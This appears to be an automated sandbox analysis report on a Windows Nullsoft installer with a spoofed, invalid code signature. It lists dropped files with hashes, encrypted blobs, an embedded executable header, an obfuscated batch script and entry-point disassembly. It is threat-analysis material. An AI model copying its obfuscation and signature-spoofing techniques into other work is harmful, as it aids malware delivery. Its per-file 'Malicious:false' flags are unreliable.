                                                  Preview:..(...N.1..,...\ab......mC.C....FZq...@..5.C'...?.....I...;.F../>+h..y".d~...F>M.....Zp..N....B....]!6..8H..KzSW.#Pf.M....++w*s...}]d.k....P.Up..R.....D.fG..d...wE....... .T..i.0$a.".$..\.$.-..z..+.._...;.".....i?./.. D.u..r.....>.+....c.(L.E..R.KI/..(.T...3......=z..."...I.M!.;....3 ..B.../z.5.......M't~.4.....gnl.:~.p^.4...f(c=.....}..!.7x..S8.KY..P....j.....z...3.N.V..E.p...5..'....L.....Tl...X.c..i5.%.........^...Hk....6./..<.`b......0...".w]S..i..F..,.3.^l../~A.....t:+X..5z.j..H.jU.......#.<.5....h.....FM....L.Z..L.ikG.h..`.E..x...:=.^2...6...lH...[ .U...S.ss;s...h....8G.....YG....g.-W)$9...b........q."...?...Qw...!.o...n...O....^Ce..FE.P...7.G...*............0.F....nR......6.X....>..OW.+.......u9.....lnp..*y..L.....B..D]..Fy...I.D.f...`..N.l^].{J U:....\.)..7.Aw.a......4wZ..V...d.WMZ...u..+.K.wCr.].._...]i...p....xO.....ELth...R.#.>..F.>.!..)..B...j.e@...3.d.NCM..7.2.........>.._....:.~....O..m...m......5.n.n..,0k....o.>E4$..3..0t1.J..H.HK.
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):6.620139174841895
                                                  Encrypted:false
                                                  SSDEEP:768:KGE0psu0nM8+aZKINulI1+lRKw4sWGuv6crP:K90psu0nMOKzlvlao/g
                                                  MD5:3E0A5939F55F64DC128EC03642F09392
                                                  SHA1:74FC5265B92BF9B807E023E968F94528904918E6
                                                  SHA-256:4B0C83524EFD0DB079ABA2519AAF676B784207AC84A7DE69918E56C698D81A91
                                                  SHA-512:EA6EB18FB83DFB46C5461E518A33E4A2279C803931E13FD5DD9D962EB4AF35637C2011708B32F1D0457798BDAD40F59DFB35EE770AA472CAB2EF4901EDDB0082
                                                  Malicious:false
                                                  Preview:.......;.......jw[..>3.j.Y..}..Wc....u..fc.......f;...>e..@f;...4e.......f;...&e.....f;....e...Axf;....d..@f;....d...Azf;....d..@f;....d...Asf;...td..@f;...jd...Auf;...^d..@f;...Td...Aqf;...Hd..@f;...>d...Awf;...2d...G.=.......d.......A..$...A.3._^[..].N".........w..Pc..3.@...A.iUE..UE.6UE.[UE...A..UE...A..UE.OVE.............................................................................................................................................................|....~...vt...}...c......t.... gJ...A..U..QQSV.u...W...}..U............c.._^[..].U..QQ...SVW..f..tvj.^......u..E.....f..u......f..ptx...;...9d..tt..U|$..Z...d....]...c....`...c....a...c..... gJ...A..t..B..7v....f..u.3._^[..].f.A......f#.....f;.u.......A...A....A...A....U...(SV.....W.....f...M.f;.......j.Z.A.f..@..c...jpXf..n......f..o......f;.......jp...Z;..\...c....]........[...c....t9..T......... gJ..4F..t..A..7vG........f...M.j.Zf;...t..._^[..]..-......yc..HH..qc..HH..ic..HHu..`c..f.F......f#......f;.u....
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):76800
                                                  Entropy (8bit):7.997675435328255
                                                  Encrypted:true
                                                  SSDEEP:1536:R8Rge2XmA1AAWokgUnPFc3QCLuOexdViaMtI1F+hrMdeombucP:WSe211AjpnPFdC6p7VDfbQX
                                                  MD5:3EC78865D37DBA4270B52656BFCD5D51
                                                  SHA1:761877D874E583014BFE9C5F0D5BA71BA4F788A6
                                                  SHA-256:7C8734F0A4571438A469037571F7AD8A7513E779FD65F3D547D1426BAD7B2034
                                                  SHA-512:CB7CAFAA16C342F9D5E4A3C9BCEBE32B1B2106AD811132BE75A4C9F9222FEA9DDC5BA5FB0C9CEF6626C01E81215F550C060E4300E9D64D83065E806B783E80C5
                                                  Malicious:false
                                                  Preview:..(...N.1..,...\ab......mC.C....FZq...@..5.C'...?.....I...;.F../>+h..y".d~...F>M.....Zp..N....B....]!6..8H..KzSW.#Pf.M....++w*s...}]d.k....P.Up..R.....D.fG..d...wE....... .T..i.0$a.".$..\.$.-..z..+.._...;.".....i?./.. D.u..r.....>.+....c.(L.E..R.KI/..(.T...3......=z..."...I.M!.;....3 ..B.../z.5.......M't~.4.....gnl.:~.p^.4...f(c=.....}..!.7x..S8.KY..P....j.....z...3.N.V..E.p...5..'....L.....Tl...X.c..i5.%.........^...Hk....6./..<.`b......0...".w]S..i..F..,.3.^l../~A.....t:+X..5z.j..H.jU.......#.<.5....h.....FM....L.Z..L.ikG.h..`.E..x...:=.^2...6...lH...[ .U...S.ss;s...h....8G.....YG....g.-W)$9...b........q."...?...Qw...!.o...n...O....^Ce..FE.P...7.G...*............0.F....nR......6.X....>..OW.+.......u9.....lnp..*y..L.....B..D]..Fy...I.D.f...`..N.l^].{J U:....\.)..7.Aw.a......4wZ..V...d.WMZ...u..+.K.wCr.].._...]i...p....xO.....ELth...R.#.>..F.>.!..)..B...j.e@...3.d.NCM..7.2.........>.._....:.~....O..m...m......5.n.n..,0k....o.>E4$..3..0t1.J..H.HK.
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):210
                                                  Entropy (8bit):4.771218508877588
                                                  Encrypted:false
                                                  SSDEEP:3:fQRLsXYRLLyiWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8GmbgElKmE/p3PeU+:fQRL7R/hqjvVg3F+X32l/8xb99E/p/L+
                                                  MD5:E5ECF7084F37757A977CB7854FAF0DD2
                                                  SHA1:6778EA5AC5ECC59171883C2AA7204373F46C5FB1
                                                  SHA-256:10D22D0F44BCDF23A31D0097069E1D095A86E2113580BFC61F50B7AC3218A4D2
                                                  SHA-512:7F4EEF0637C68154BE4341C02DA291E8B81E64ECD7ED5CBA5D30A2E1A2E63839C1682FDADE36A9DA06124321AEC610EFAF23B4B5FCDD1BF4C6BE104E7C0D9CEB
                                                  Malicious:false
                                                  Preview:SlutSteLouisTranslation..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):123904
                                                  Entropy (8bit):6.342819068764455
                                                  Encrypted:false
                                                  SSDEEP:1536:TCV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpRGDox2S3hPt8gNpkU5uG3xYwBMN:TCV26MqgQTc5F446iYNpK5SB7BJBzS
                                                  MD5:00425DB818E6FD2F0EEB0CF37469B749
                                                  SHA1:D9BD6E0AFCA273AA8A931360C2F91C0D9D1463A1
                                                  SHA-256:DA879D5EB37E5C0EF62422B95ADB8AA39607BB6C6D1EFA817CB8353633B8D0EB
                                                  SHA-512:9B8D7AA19308B7376B4933E09613BAC281D0AB332BCE661B7E590F6568519C66A6D307883B3274E6668AD61B4EE52E519D8A574F6202AD827B9F0A2AA8366721
                                                  Malicious:false
                                                  Preview:j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):61440
                                                  Entropy (8bit):7.997175895163403
                                                  Encrypted:true
                                                  SSDEEP:1536:0rAGBBNImxCyakScpiByZYeNEHTeUOuNUBO0YgHXH6M1Sgqjw5:0rAGr/PxSc0eH6HTeUOuec0Yg3apK
                                                  MD5:901F468EEDA506282D7906687C36EF22
                                                  SHA1:0FB000FA798D648C1309CC6599692ED6AC4D4990
                                                  SHA-256:2F64E2C562E065AE15A95BE85D128E6F99F6D201B3B18A8CF5DBB1AB8CB87D62
                                                  SHA-512:17B4768CE6075EA83B774CF37BC2C2F2B7F6B78156C883CB6FA38422513FD8E19E03556A5BAF549E31B4F02DE78638A3F480421440F4E38EA32E8CD014CEE0E0
                                                  Malicious:false
                                                  Preview:.Q..]......'8s...d.z.-..md;.i...#...3..*6%.m.R..}..'..M.....0......|t)...Gn..f.M....m..%*....@..k..K...u..X....=[nt.....c...X.$.R..E7.I.OCh8.HN&..Og...7...!..y....C....5.Y4.Y....j7S...O .I/N..2X..y..6.QC.7YN.A....1..p..T..HX........PMC[d.;.{=.. &..c9.a.*.k.}.et.t]...Au.IKj....bSUg..."...Nq.!8.^.ga.....4`.....:..."oZ.g........u^..{.M.(..Eh[uM...G..&.....YK..........B.B......_...JG......n.-.-.B1`d.Yr..sr.)N...(..|..Z.eb". Vnj..f.Y@...@...Xg..Hu]...^8..~X..f.J...H......*B.e.Q...*...r.~.e.hW....-...b.?...RONyx...Eu=...-....v.&P2s.I..c...H&......DT..?...-*..a\sh....!.`..e..r.Klw.......%.\W.m.~Yk.S.q.`DZ.G..H^..:.ta.v.=.].......t....(K..H......'=.o..?...9.:..<d.!U......[.).Zs\4..,y5......K.....g......m......FuFN..G...uZy..V.........|..O)....k.0*C..(....wC1.q... ..#..'..J.P(.).T.6|..8x.R..P`oh...F........t..M....b...7......K..0%a...>.......P34.mW?.\.j.A..b..G..Q]..lq..[5.....}.(BD....Z..=S.<.....T....}..5.;w.I......G.)V..i!.z.#.)
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):100352
                                                  Entropy (8bit):6.762258860090385
                                                  Encrypted:false
                                                  SSDEEP:1536:0Is2ziQD2tR/i0027EM/awuUwU7KxQefixl2vqWWGlHHvpKa5Gk6/vij4O:0Is8di/37EM/j2xQeixApVIa0/viH
                                                  MD5:83AEEA636C54D733CC32AB493A5364D4
                                                  SHA1:545C1357944C51E9F8D2110D01DFA2076A716613
                                                  SHA-256:0D5602BA1E91C3672992926D40ADE260DB5DF228AF923DF30C5BF4242DF2F133
                                                  SHA-512:F61ACFB0B7ACE3331945DD1B623FED445B8E2641380861708D1146CA595BB921B81025F9E39AA8C94F7FEF20635F009FD8BD4697227F61ED7B5DEE56466B616A
                                                  Malicious:false
                                                  Preview:SV.u.3.W........tf=..L.t_.Fx..tX9.uT........t.9.u.P.............YY.F|..t.9.u.P.v.............YY.vx.a..........V...YY........tD9.u@......-....P.5..............+.P.".........+.P.........................=..L.t.9.....u.P.q..............YYj.X.......E..~......L.t.....t..8.u.P....3...YY.E.....t..G...t..8.u.P...Y.E.......H.E.u.V.{...Y_^[].U..U.........SV...W.......Jx..t...............t........J|..t...............t.......j..J.[.y...L.t..9..t........y..t..y...t..........Ku...............1N_^[..].j.hX.K..t....e.............L..Npt".~l.t.......pl..u.j .....Y.......j..@...Y.e...54.L..FlP.!...YY...u..E...........u.j..w...Y.U..W.}...t;.E...t4V.0;.t(W.8.....Y..t.V.....>.Yu...8.L.t.V.F...Y..^..3._].=TrL..u.j..M...Y..TrL.....3..U..E.-....t&...t....t.Ht.3.].0?I.].,?I.].(?I.].$?I.].U.....M.j......%$RL...E....u...$RL.........I..,...u...$RL.........I......u..E...$RL......@..}..t..M..ap...].U..S.].VWh....3..s.WV....{.3..{................{.......L.+...7..FIu..............9..AJu._^[].U
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):226799
                                                  Entropy (8bit):5.82856661945802
                                                  Encrypted:false
                                                  SSDEEP:3072:XaAt7P+6i/xhgariwYLTNaWy4ZNoBVxjCPjojv:XdFW6wgarnYNhBZ2BV8jojv
                                                  MD5:634D131AEF5FB9666CDCAF3C8C2C4260
                                                  SHA1:87200BE917FF801478DEA404EF60980C45D05CDE
                                                  SHA-256:4536F5904C52E8E2B0B7AA3C5CF2527FE09DAD507A40335473D4386EEF02E0D7
                                                  SHA-512:AA87118CD7CF36B567D58B0DB75BF3E2058C8E3F7ACE69E8BE0E7F79E10AD316101BBDD3FACAF9E725B75E4B755B8F674C1070A51DA4DBC0720F4D1DE1DBD3C0
                                                  Malicious:false
                                                  Preview:.......!.......!.......!...8...!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+*..!...]...!...(*..!...?*..!...=...!...E...!...G...!....*..!....*..!....*..!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!...*...!....)..!...&...!...*...!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... ....................................
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:ASCII text, with very long lines (1249), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):24402
                                                  Entropy (8bit):5.038955160795066
                                                  Encrypted:false
                                                  SSDEEP:384:euFFnJ3Qk/9p5unBL9kgyEGQYeE5b712pSnSLEf1qjWfEPE3BZbYDv70:Hp3Qc9W9kgyEGneE17MuSLwfEPE37YD4
                                                  MD5:14DBB5FCFE93369164F6423EF2A9A618
                                                  SHA1:C5D414A05EECFD9BA26EDE311DBE0C6ADDC62F79
                                                  SHA-256:6CB0F1E1D71431257F46DB15167CD8BF22313E6AB3425BAD00C64EA918F213A5
                                                  SHA-512:28E64E8D41DA778CD1BA5C29667FD54F3CA5AF276D87F8AA3D14EC77A1C15E04F5A58D7C0E5DF8807D2C5381960F3FC25394F949365D09EBF8455A63470F2E8E
                                                  Malicious:false
                                                  Preview:Set Belfast=p..TxfHope Falling Cottage Sunset Sensor Libraries Conversations Exotic ..PXMAWhile Signs Pic Ads Handles Cache Energy Minnesota ..AhfAdventure Tied Oxygen Recognition His Automation Drugs Trek Rm ..eTzConsider Enough Biological Arrived Para Guardian ..yrVSCommitted Left Stuart Rx Pump Occasional Ld Llp Computing ..irBDe Suggestions Costs Jennifer Numeric Change Alternative ..yhbNy Therapist Abandoned Token Soundtrack ..TvUOWould ..vaSRuns Citations Americas Listed ..ouUEPushing Vocal Pest ..Set Hacker=M..hqLiving Duo Myers Hopkins Confirmed Booth ..bPkSScholarships Commissions ..syTube Parents Reasonable Switches ..jcIowa Database ..nJaRes Extraordinary Capacity Compound ..RcpKPolicies Relaxation Carrier ..OCrmFavor Forum Taylor Pattern Donors Fioricet Affecting Anatomy Pairs ..tsCRefresh Anaheim Stockholm Welding Celebrities ..Set Frequency=W..bwCLan Documents Dash ..JfZOBacteria ..JSRLRwanda Painting Ob Yr Cake Diamond Guidelines Testimonials ..DWufTony Stylus Blanket Up
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with very long lines (1249), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):24402
                                                  Entropy (8bit):5.038955160795066
                                                  Encrypted:false
                                                  SSDEEP:384:euFFnJ3Qk/9p5unBL9kgyEGQYeE5b712pSnSLEf1qjWfEPE3BZbYDv70:Hp3Qc9W9kgyEGneE17MuSLwfEPE37YD4
                                                  MD5:14DBB5FCFE93369164F6423EF2A9A618
                                                  SHA1:C5D414A05EECFD9BA26EDE311DBE0C6ADDC62F79
                                                  SHA-256:6CB0F1E1D71431257F46DB15167CD8BF22313E6AB3425BAD00C64EA918F213A5
                                                  SHA-512:28E64E8D41DA778CD1BA5C29667FD54F3CA5AF276D87F8AA3D14EC77A1C15E04F5A58D7C0E5DF8807D2C5381960F3FC25394F949365D09EBF8455A63470F2E8E
                                                  Malicious:false
                                                  Preview:Set Belfast=p..TxfHope Falling Cottage Sunset Sensor Libraries Conversations Exotic ..PXMAWhile Signs Pic Ads Handles Cache Energy Minnesota ..AhfAdventure Tied Oxygen Recognition His Automation Drugs Trek Rm ..eTzConsider Enough Biological Arrived Para Guardian ..yrVSCommitted Left Stuart Rx Pump Occasional Ld Llp Computing ..irBDe Suggestions Costs Jennifer Numeric Change Alternative ..yhbNy Therapist Abandoned Token Soundtrack ..TvUOWould ..vaSRuns Citations Americas Listed ..ouUEPushing Vocal Pest ..Set Hacker=M..hqLiving Duo Myers Hopkins Confirmed Booth ..bPkSScholarships Commissions ..syTube Parents Reasonable Switches ..jcIowa Database ..nJaRes Extraordinary Capacity Compound ..RcpKPolicies Relaxation Carrier ..OCrmFavor Forum Taylor Pattern Donors Fioricet Affecting Anatomy Pairs ..tsCRefresh Anaheim Stockholm Welding Celebrities ..Set Frequency=W..bwCLan Documents Dash ..JfZOBacteria ..JSRLRwanda Painting Ob Yr Cake Diamond Guidelines Testimonials ..DWufTony Stylus Blanket Up
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):6.638811504058874
                                                  Encrypted:false
                                                  SSDEEP:1536:Wg/Pp5q/qw0j8sgyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSH:9XqGjLPQ6ClAMfA4lelIJBSLPNV
                                                  MD5:237D2F88A43C21C9BC5599BE91B3571B
                                                  SHA1:E94251DD329300F7C74631CDAAFD5F504C4866FA
                                                  SHA-256:698E3ABA58EDB38FB5C26CB561C65811636A18F8DD28EDBE2CF9FCBA87DF229C
                                                  SHA-512:79249B8A15E807C2AF0423D2FB5615D96E95EE1A7E4E6E10FA196838194C1EE16F11C41D5580C9D40A693937FECF392E1C607439E3012BB035A99FA7A1334213
                                                  Malicious:false
                                                  Preview:.D..C.....0....t..J.j..U..N....E.....s..R..........s........s..3.8.....s.....@..s............I..E.P..B...E....s..3..{s...N..y0..t.Q..X...~..F...s..Q.....E......es..........es...$.2.D..u....Ss..V..\.I..u..~.u....<s...N..h.u....,s..Q....(....s...E..p.........u..C.u.....s..Q...`....r...u.....r..Q...`....r...u.....r........V.F.......r....D...D...D...@...@...D...@...D...D...D.b.D.A.@.A.@.A.D.A.@.U.D.w.D...D...D...D...D.).D.C.D.|.@...D.|.@.|.@.k.D.|.@.).D.n.D...D...D...D...D.m.@...D...D.u.D...D.0.D.Y.D...D.Y.D.Y.D...D.Y.D.I.D.;.D.V.D.^.D...D...D...D.V.D...D.m.D.z.D...D...@...D...D.4.D.4.D...@.4.D...D...D...D...D..@..@.|.D..@...D...D...D...D...D...D..G..M..@...@.Ph.........C....u..M..E.j.P.E.PW..Q......_u... ...u$.M..E.j.P.E.PW.........=u...]..M..]..G....f.x.Nt..r...8....u..j..E.AP.E..M..M.PW.7.......t...E...u..E...P.+6...s.....uj.M.j..M..............)...........~yj..%....~nj.j..u...%.......t[j.j..u...%.......P..5...E.P.M..5....s.....uk.M..A..x..~"j.j......P.
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):6.669438607849053
                                                  Encrypted:false
                                                  SSDEEP:6144:+VPlcBgtoTqnvAfcaG9b2M8JTDD/xcq21R1p/rAOPOei7j:YlcqikvAfcN9b2MyZa31troPj
                                                  MD5:9747E2F0863C6ACEE2CAD8E96980658A
                                                  SHA1:3DA9CFB884A513A5ECD9138D09287055A423D110
                                                  SHA-256:6F47415606C5B750D66C7340F65A3FECAFE28B2E7A83DADC3DC154D72B727FFF
                                                  SHA-512:A48ACF816E1D607925A549B904A52665C5AAAB37A3A9F198183E78C7EBFF22806C1D74B934B01298DA82B5701D553D1DA4EBF1862099ED0091CEDFE0571BB744
                                                  Malicious:false
                                                  Preview:..8.M.V.BY...M..:Y...u..~........h..K..6.Gx..YY........h..K..6.1x..YY..u.h..K.....j.h..K..6.........u.h.K...j.h.K..6.........u.h..K..M...^..j.j..&j.h..K..6........uDh(.K..M..^..j.j..E..P...P.M...c...M..$c...E.P.c....E.P.M..9^...&h8.K..6.xw..YY..u,h@.K...h..K..M..R^..hL.K..M..$_...E..P.b...M...b...M..b..^..]...U.....M.SW..W..3.j;..[.M.W..[..3.f9..M.t,W..[..f9.u.S.M...Z...M.W..[...M....P..Z..G...E.P.?b...M..Qb.._[..]...U..M.].....U..........SV..W3....|$..C.@t.GF.t$..C..t/h.....D$$P.u...H.I..D$ P.......|..YY..u.GF.t$..C........h.....D$$P.u...l.I..{..u..D$ P.,s..YP.D$$P..|.I..C..|$.Ht,Ht.Hu>.s..D$$P.R|..YY.(.s..D$$P.o...YY..t....s..D$$P.s..?}.......u.G.C..u,h.....D$$P.u...H.I..D$ Ph..K...{..YY..u..|$.F.t$..C..t{h.....D$$P.u...l.I..D$ P.L$..}^...D$.P.K4.$V...L$...`...K4.?....t/.C..u(h.....D$$P.u...H.I..D$ Ph..K..y{..YY..t.G.t$.F.t$..C..tIh.....D$$P.u...H.I..D$ P.L$...]...D$.P.Kl.U...L$..f`...Kl..?....t.G.t$.F.C..t.;.u..u..........t.GF.K.......tk.D$.P.u.....I..K...y..D$.9
                                                  Process:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):110190
                                                  Entropy (8bit):7.998515691364792
                                                  Encrypted:true
                                                  SSDEEP:3072:BbqImoZ2Xq13nYOeI9SjFlWkHtI+m+xH0kXnb85y:pqIbX13nYOh+dtIyV0krz
                                                  MD5:C7980F56319F536020F8BEF4BB8974C0
                                                  SHA1:ADB8ADF76B9ADD121CEFBCE1C58CA5510D21F671
                                                  SHA-256:9E5BDBE0A3F24B4700E379F38FE40928EBFE69FC2FB2E9D2FD942B6CF7991545
                                                  SHA-512:CB37715791F3E3D8C4BD30CCC8E3E8E84F4A8720467F80E742D70AA6E9755F1ECEC9DB8CF55D4D8F8572DCE818F55FF7C3771BBACD6FA597C4DB04AE56389E70
                                                  Malicious:false
                                                  Preview:..V.1TF.....deIR..o...~.R5.I5p|......V+.qr..m_.3..^.djy/..w>....3.j...=.E......>..,.#....P..+.K%n!H,...:~.N...4.i.g....".sm...!......T.O...;..4.w.?.-a[s..i.....x..E7".r..~.(.K.BW...H\.Z7J...../.7..{..L....{....)....`.j.j...)..XQ.zj.c...I].3...T.....:...%..n.R.^h.hm.u..>....[._92.]..tuO...T....z....B[..AA....I.N......yA.M....ds.'l.....8D.K..U6....V.J........!.yx*6....w.)...q....E.. ........._.`..>......lQ.k.y4.....A.=..Q\2_[K..U{..(:.M...m9.k~.[..GYN..!...^...),.}...[0...r...}..Se......!~..RRz.f...#Z~_c.t.}eB...x'..#..uv{a..$.....w.gMz.8.\.......fXh...!|~f..../'...0.-...c..5.R.H.b..w.3D!.f.T..........2H.L...p...-mjY.X...B6;Ew...-.g....i.a.....0}M5.....b.oI..h#H,.*.....XM..a.....W...W".%...qXx...@.........+......W..-.Es.#...a."..^..Y.]..........X..Rb.[..,....;. S.81l...&..@...s..c.7...O....+.......9..mP.........#....j..-.?...g.).....*\.j.....q.ta..#..R........[..=....b...S.C.@[.9........W.=..B+.j.P....._t..b.dK..%Gv.5o26..".~...MF...
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Entropy (8bit):7.978647228575858
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:lSmb6nDsrC.exe
                                                  File size:709'936 bytes
                                                  MD5:83741bbca9631aa4925203fbddc0ad7d
                                                  SHA1:f636ef4f3279cd49d1036a70293f8390ecc96a3e
                                                  SHA256:538af0e39f24f16e4e52cad03295a359304d8f458c1fe18d0681e884112f2185
                                                  SHA512:55ee1b215e46024c3bb3722518d476be148c3c48d60d744c53fecba48b7a02ba9ab2f58b436b9657e4748d72d6696bc5e6f477f7805f91fa66841debd00b9a5b
                                                  SSDEEP:12288:tXBffJMAUAyQAg8Y3ElBvCm5KUwzq2uE2na367joJqTOX7gXX7:tXBfmPQXMqm5wzq2uDa367joJqaXQ7
                                                  TLSH:61E423841E40D66BE7628D355DB0D637C7FDEA1496BC02870B689F2CE874BD2AE0531B
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                  Icon Hash:0cf4e0c0eefcf870
                                                  Entrypoint:0x4034fc
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                  Signature Valid:false
                                                  Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                  Signature Validation Error:The digital signature of the object did not verify
                                                  Error Number:-2146869232
                                                  Not Before, Not After
                                                  • 22/08/2023 10:26:26 08/11/2026 13:04:55
                                                  Subject Chain
                                                  • E=support@aimp.ru, CN=IP Izmaylov Artem Andreevich, O=IP Izmaylov Artem Andreevich, L=Tula, S=Tula Oblast, C=RU
                                                  Version:3
                                                  Thumbprint MD5:6D19725F7816780EA2486A64C132A93F
                                                  Thumbprint SHA-1:1E18B76E7832F103B16AE8AED5A5DCD16345CEF8
                                                  Thumbprint SHA-256:FE00B31A9784D9243385599AEA8382EB420939EA7515813C4C4151AC35C9DFE2
                                                  Serial:09599DA198AB73B39CE6638B
                                                  Instruction
                                                  sub esp, 000003F8h
                                                  push ebp
                                                  push esi
                                                  push edi
                                                  push 00000020h
                                                  pop edi
                                                  xor ebp, ebp
                                                  push 00008001h
                                                  mov dword ptr [esp+20h], ebp
                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                  mov dword ptr [esp+14h], ebp
                                                  call dword ptr [004080A4h]
                                                  mov esi, dword ptr [004080A8h]
                                                  lea eax, dword ptr [esp+34h]
                                                  push eax
                                                  mov dword ptr [esp+4Ch], ebp
                                                  mov dword ptr [esp+0000014Ch], ebp
                                                  mov dword ptr [esp+00000150h], ebp
                                                  mov dword ptr [esp+38h], 0000011Ch
                                                  call esi
                                                  test eax, eax
                                                  jne 00007FA3A4DC43EAh
                                                  lea eax, dword ptr [esp+34h]
                                                  mov dword ptr [esp+34h], 00000114h
                                                  push eax
                                                  call esi
                                                  mov ax, word ptr [esp+48h]
                                                  mov ecx, dword ptr [esp+62h]
                                                  sub ax, 00000053h
                                                  add ecx, FFFFFFD0h
                                                  neg ax
                                                  sbb eax, eax
                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                  not eax
                                                  and eax, ecx
                                                  mov word ptr [esp+00000148h], ax
                                                  cmp dword ptr [esp+38h], 0Ah
                                                  jnc 00007FA3A4DC43B8h
                                                  and word ptr [esp+42h], 0000h
                                                  mov eax, dword ptr [esp+40h]
                                                  movzx ecx, byte ptr [esp+3Ch]
                                                  mov dword ptr [00429AD8h], eax
                                                  xor eax, eax
                                                  mov ah, byte ptr [esp+38h]
                                                  movzx eax, ax
                                                  or eax, ecx
                                                  xor ecx, ecx
                                                  mov ch, byte ptr [esp+00000148h]
                                                  movzx ecx, cx
                                                  shl eax, 10h
                                                  or eax, ecx
                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                  Programming Language:
                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x1890.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xab0500x24e0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
